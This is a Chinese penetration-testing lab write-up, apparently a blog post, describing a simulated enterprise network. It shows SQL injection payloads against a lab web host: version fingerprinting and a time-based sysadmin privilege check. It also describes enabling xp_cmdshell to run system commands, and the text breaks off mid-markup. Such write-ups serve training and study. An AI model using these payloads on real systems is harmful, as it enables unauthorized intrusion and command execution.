无弹窗渗透测试实验

isnull   ·   发表于 2019-04-01 11:55:05   ·   漏洞文章
<p><br/></p><h4 style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: bold; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">0x01&nbsp;前渗透</h4><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">内网拓扑说明：</p><ol style="box-sizing: border-box; margin: 0px 0px 30px 20px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); list-style: square; color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><li style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent; list-style-type: none;"><ol style="box-sizing: border-box; margin: 0px 0px 30px 20px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent; list-style: square;"><li style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent;">10.101.101.0/24&nbsp;网段模拟的是外网的地址</li></ol></li></ol><ol style="box-sizing: border-box; margin: 0px 0px 30px 20px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); list-style: square; color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><li style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent; list-style-type: none;"><ol style="box-sizing: border-box; margin: 0px 0px 30px 20px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent; list-style: square;"><li style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent;">192.168.101.0/24&nbsp;网段模拟的是一个小型企业的内网中的应用服务器网络</li></ol></li></ol><ol style="box-sizing: border-box; margin: 0px 0px 30px 20px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); list-style: square; color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><li style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent; list-style-type: none;"><ol style="box-sizing: border-box; margin: 0px 0px 30px 20px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent; list-style: square;"><li style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent;">192.168.111.0/24&nbsp;网段模拟的是一个小型企业的内网中的办公网络</li></ol></li></ol><ol style="box-sizing: border-box; margin: 0px 0px 30px 20px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); list-style: square; color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><li style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent; list-style-type: none;"><ol style="box-sizing: border-box; margin: 0px 0px 30px 20px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent; list-style: square;"><li style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent;">企业内网可以无限制的访问到外网，但是外网无法访问到企业内网</li></ol></li></ol><ol style="box-sizing: border-box; margin: 0px 0px 30px 20px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); list-style: square; color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><li style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent; list-style-type: none;"><ol style="box-sizing: border-box; margin: 0px 0px 30px 20px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent; list-style: square;"><li style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent;">办公网可以无限制的访问到应用服务器网络，但是应用服务器网络无法访问到办公网络</li></ol></li></ol><ol style="box-sizing: border-box; margin: 0px 0px 30px 20px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); list-style: square; color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><li style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent; list-style-type: none;"><ol style="box-sizing: border-box; margin: 0px 0px 30px 20px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent; list-style: square;"><li style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent;">部分服务器打了全部的补丁，并且保持正常更新</li></ol></li></ol><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">内网拓扑图：</p><p><span style="letter-spacing: 1px;"><img src="https://ws1.sinaimg.cn/large/c334041bgy1fj7enwktl2j21hl1uy0u3.jpg"/><br/></span></p><p><span style="letter-spacing: 1px;"></span></p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">扫描&nbsp;10.101.101.13&nbsp;后发现此服务器开放&nbsp;80、82&nbsp;端口，&nbsp;Win2008&nbsp;系统，80&nbsp;端口处发现&nbsp;SQL&nbsp;注入，获取数据库和数据库所在服务器版本：</p><div id="crayon-5c25a60d4f774166013378" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-mac print-yes notranslate" style="box-sizing: border-box; margin: 12px 0px; padding: 0px; border: 1px solid rgb(222, 222, 222) !important; font-weight: 500; font-style: normal; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace; vertical-align: baseline; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(248, 248, 255) !important; text-align: left; text-size-adjust: none; overflow: hidden !important; position: relative !important; direction: ltr !important; width: 620px; line-height: 15px !important; color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; height: auto;"><div class="crayon-toolbar" style="box-sizing: border-box; margin: 0px; padding: 0px; border-top: 0px; border-right: 0px; border-bottom: 1px solid rgb(222, 222, 222) !important; border-left: 0px; border-image: initial; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left; width: 618px; position: relative; overflow: hidden; z-index: 4; height: 18px !important; line-height: 18px !important;"><span class="crayon-title" style="box-sizing: border-box; margin: 0px; padding: 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;"></span><div class="crayon-tools" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 12px !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: 18px !important; line-height: 18px !important; position: absolute; right: 0px;"><span class="crayon-language" style="box-sizing: border-box; margin: 0px; padding: 0px 8px 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;">Default</span></div></div><div class="crayon-plain-wrap" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; height: auto !important;"></div><div class="crayon-main" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; width: 618px; overflow: hidden; position: relative; z-index: 1;"><table class="crayon-table" style="box-sizing: border-box; margin-top: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-left: 0px; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; border-collapse: collapse !important; border-spacing: 0px !important; width: auto !important; table-layout: auto !important;"><tbody style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: transparent;"><tr class="crayon-row" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center;"><td class="crayon-nums " style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left;"><div class="crayon-nums-content" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; white-space: nowrap; line-height: 15px !important;"><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">1</div></div></td><td class="crayon-code" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center; text-align: left; width: 599.2px;"><div class="crayon-pre" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; text-align: left; color: rgb(0, 0, 0); white-space: pre; overflow: visible; tab-size: 4; line-height: 15px !important;"><div class="crayon-line" id="crayon-5c25a60d4f774166013378-1" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">http</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">:</span><span class="crayon-c" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: italic !important; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(153, 153, 153) !important;">//10.101.101.13/?page=1&nbsp;and&nbsp;@@version>0&nbsp;--</span></div></div></td></tr></tbody></table></div></div><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><img src="https://ws1.sinaimg.cn/large/c334041bgy1fj7erqou42j21670loqi6.jpg" alt="" style="box-sizing: border-box; margin: 0px auto; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: middle; background: transparent; display: block; max-width: 100%; height: auto;"/></p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">数据库是&nbsp;2008r2&nbsp;的，所在的操作系统是&nbsp;Win2008&nbsp;或&nbsp;Win7，随后看数据库：</p><div id="crayon-5c25a60d4f784930388184" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-mac print-yes notranslate" style="box-sizing: border-box; margin: 12px 0px; padding: 0px; border: 1px solid rgb(222, 222, 222) !important; font-weight: 500; font-style: normal; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace; vertical-align: baseline; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(248, 248, 255) !important; text-align: left; text-size-adjust: none; overflow: hidden !important; position: relative !important; direction: ltr !important; width: 620px; line-height: 15px !important; color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; height: auto;"><div class="crayon-toolbar" style="box-sizing: border-box; margin: 0px; padding: 0px; border-top: 0px; border-right: 0px; border-bottom: 1px solid rgb(222, 222, 222) !important; border-left: 0px; border-image: initial; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left; width: 618px; position: relative; overflow: hidden; z-index: 4; height: 18px !important; line-height: 18px !important;"><br/><span class="crayon-title" style="box-sizing: border-box; margin: 0px; padding: 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;"></span><div class="crayon-tools" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 12px !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: 18px !important; line-height: 18px !important; position: absolute; right: 0px;"><span class="crayon-language" style="box-sizing: border-box; margin: 0px; padding: 0px 8px 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;">Default</span></div></div><div class="crayon-plain-wrap" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; height: auto !important;"></div><div class="crayon-main" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; width: 618px; overflow: hidden; position: relative; z-index: 1;"><table class="crayon-table" style="box-sizing: border-box; margin-top: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-left: 0px; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; border-collapse: collapse !important; border-spacing: 0px !important; width: auto !important; table-layout: auto !important;"><tbody style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: transparent;"><tr class="crayon-row" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center;"><td class="crayon-nums " style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left;"><div class="crayon-nums-content" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; white-space: nowrap; line-height: 15px !important;"><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">1</div></div></td><td class="crayon-code" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center; text-align: left; width: 644px;"><div class="crayon-pre" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; text-align: left; color: rgb(0, 0, 0); white-space: pre; overflow: visible; tab-size: 4; line-height: 15px !important;"><div class="crayon-line" id="crayon-5c25a60d4f784930388184-1" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">http</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">:</span><span class="crayon-c" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: italic !important; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(153, 153, 153) !important;">//10.101.101.13/?page=1;if&nbsp;IS_SRVROLEMEMBER(&#39;sysadmin&#39;)=1&nbsp;waitfor&nbsp;delay&nbsp;&#39;0:0:5&#39;&nbsp;--</span></div></div></td></tr></tbody></table></div></div><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">这个语句测试数据库的权限，发现有延时，证明是有数据库的权限是dba的权限，打开&nbsp;xp_cmdshell&nbsp;的限制，创建临时表执行命令并将结果写入新创建的临时表中：</p><div id="crayon-5c25a60d4f78a996554922" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-mac print-yes notranslate" style="box-sizing: border-box; margin: 12px 0px; padding: 0px; border: 1px solid rgb(222, 222, 222) !important; font-weight: 500; font-style: normal; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace; vertical-align: baseline; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(248, 248, 255) !important; text-align: left; text-size-adjust: none; overflow: hidden !important; position: relative !important; direction: ltr !important; width: 620px; line-height: 15px !important; color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; height: auto;"><div class="crayon-toolbar" style="box-sizing: border-box; margin: 0px; padding: 0px; border-top: 0px; border-right: 0px; border-bottom: 1px solid rgb(222, 222, 222) !important; border-left: 0px; border-image: initial; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 